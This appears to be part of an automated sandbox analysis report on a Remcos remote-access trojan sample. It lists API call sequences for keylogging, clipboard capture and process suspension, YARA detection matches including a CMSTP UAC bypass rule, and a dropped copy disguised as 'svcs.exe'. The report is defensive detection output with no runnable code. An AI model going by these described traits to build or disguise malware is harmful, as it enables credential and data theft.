                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,0_2_0040B70E
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,0_2_004168C1
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: 3_2_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,3_2_004168C1
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,0_2_0040B70E
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_0040A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,0_2_0040A3E0

                      E-Banking Fraud

                      barindex
                      Yara detected Remcos RAT
                      Source: Yara matchFile source: 1m70ggeepT.exe, type: SAMPLE
                      Source: Yara matchFile source: 6.0.svcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.svcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.svcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.1m70ggeepT.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.svcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.svcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.svcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.svcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.0.svcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.1m70ggeepT.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000000.1964334212.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2146990642.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.4433601862.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000000.2146249448.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.1967000306.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000000.2227030534.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2227453326.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000000.2066099543.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 1m70ggeepT.exe PID: 6544, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svcs.exe PID: 5528, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svcs.exe PID: 5864, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svcs.exe PID: 5324, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svcs.exe PID: 4616, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe, type: DROPPED

                      Spam, unwanted Advertisements and Ransom Demands

                      barindex
                      Contains functionalty to change the wallpaper
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_0041C9E2 SystemParametersInfoW,0_2_0041C9E2
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: 3_2_0041C9E2 SystemParametersInfoW,3_2_0041C9E2

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: 1m70ggeepT.exe, type: SAMPLEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 1m70ggeepT.exe, type: SAMPLEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 1m70ggeepT.exe, type: SAMPLEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 6.0.svcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 6.0.svcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 6.0.svcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 1.0.svcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 1.0.svcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 1.0.svcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 1.2.svcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 1.2.svcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 1.2.svcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 0.0.1m70ggeepT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 0.0.1m70ggeepT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 0.0.1m70ggeepT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 4.2.svcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 4.2.svcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 4.2.svcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 3.2.svcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 3.2.svcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 3.2.svcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 3.0.svcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 3.0.svcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 3.0.svcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 6.2.svcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 6.2.svcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 6.2.svcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 4.0.svcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 4.0.svcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 4.0.svcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 0.2.1m70ggeepT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 0.2.1m70ggeepT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 0.2.1m70ggeepT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 00000000.00000000.1964334212.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000004.00000002.2146990642.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000001.00000002.4433601862.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000004.00000000.2146249448.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000001.00000000.1967000306.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000006.00000000.2227030534.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000006.00000002.2227453326.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000003.00000000.2066099543.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: 1m70ggeepT.exe PID: 6544, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: svcs.exe PID: 5528, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: svcs.exe PID: 5864, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: svcs.exe PID: 5324, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: svcs.exe PID: 4616, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe, type: DROPPEDMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe, type: DROPPEDMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe, type: DROPPEDMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeProcess Stats: CPU usage > 49%
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_004132D2 OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,0_2_004132D2
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_0041BB09 OpenProcess,NtSuspendProcess,CloseHandle,0_2_0041BB09
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_0041BB35 OpenProcess,NtResumeProcess,CloseHandle,0_2_0041BB35
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: 3_2_004132D2 OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,3_2_004132D2
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: 3_2_0041BB09 OpenProcess,NtSuspendProcess,CloseHandle,3_2_0041BB09
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: 3_2_0041BB35 OpenProcess,NtResumeProcess,CloseHandle,3_2_0041BB35
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress,0_2_004167B4
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: 3_2_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress,3_2_004167B4
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_0043E0CC0_2_0043E0CC
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_0041F0FA0_2_0041F0FA
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_004541590_2_00454159
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_004381680_2_00438168
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_004461F00_2_004461F0
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_0043E2FB0_2_0043E2FB
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_0045332B0_2_0045332B
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_0042739D0_2_0042739D
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_004374E60_2_004374E6
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_0043E5580_2_0043E558
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_004387700_2_00438770
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_004378FE0_2_004378FE
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_004339460_2_00433946
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_0044D9C90_2_0044D9C9
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_00427A460_2_00427A46
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_0041DB620_2_0041DB62
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_00427BAF0_2_00427BAF
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_00437D330_2_00437D33
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_00435E5E0_2_00435E5E
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_00426E0E0_2_00426E0E
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_0043DE9D0_2_0043DE9D
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_00413FCA0_2_00413FCA
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_00436FEA0_2_00436FEA
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: 3_2_0043E0CC3_2_0043E0CC
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: 3_2_0041F0FA3_2_0041F0FA
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: 3_2_004541593_2_00454159
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: 3_2_004381683_2_00438168
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: 3_2_004461F03_2_004461F0
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: 3_2_0043E2FB3_2_0043E2FB
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: 3_2_0045332B3_2_0045332B
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: 3_2_0042739D3_2_0042739D
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: 3_2_004374E63_2_004374E6
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: 3_2_0043E5583_2_0043E558
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: 3_2_004387703_2_00438770
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: 3_2_004378FE3_2_004378FE
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: 3_2_004339463_2_00433946
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: 3_2_0044D9C93_2_0044D9C9
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: 3_2_00427A463_2_00427A46
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: 3_2_0041DB623_2_0041DB62
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: 3_2_00427BAF3_2_00427BAF
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: 3_2_00437D333_2_00437D33
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: 3_2_00435E5E3_2_00435E5E
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: 3_2_00426E0E3_2_00426E0E
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: 3_2_0043DE9D3_2_0043DE9D
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: 3_2_00413FCA3_2_00413FCA
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: 3_2_00436FEA3_2_00436FEA
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: String function: 00434E10 appears 54 times
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: String function: 00402093 appears 50 times
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: String function: 00434770 appears 42 times
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: String function: 00401E65 appears 35 times
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: String function: 00434E10 appears 54 times
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: String function: 00402093 appears 50 times
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: String function: 00434770 appears 42 times
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: String function: 00401E65 appears 34 times
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeSection loaded: rstrtmgr.dllJump to behavior
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeSection loaded: rstrtmgr.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeSection loaded: rstrtmgr.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeSection loaded: rstrtmgr.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeSection loaded: rstrtmgr.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: 1m70ggeepT.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 1m70ggeepT.exe, type: SAMPLEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 1m70ggeepT.exe, type: SAMPLEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 1m70ggeepT.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 6.0.svcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
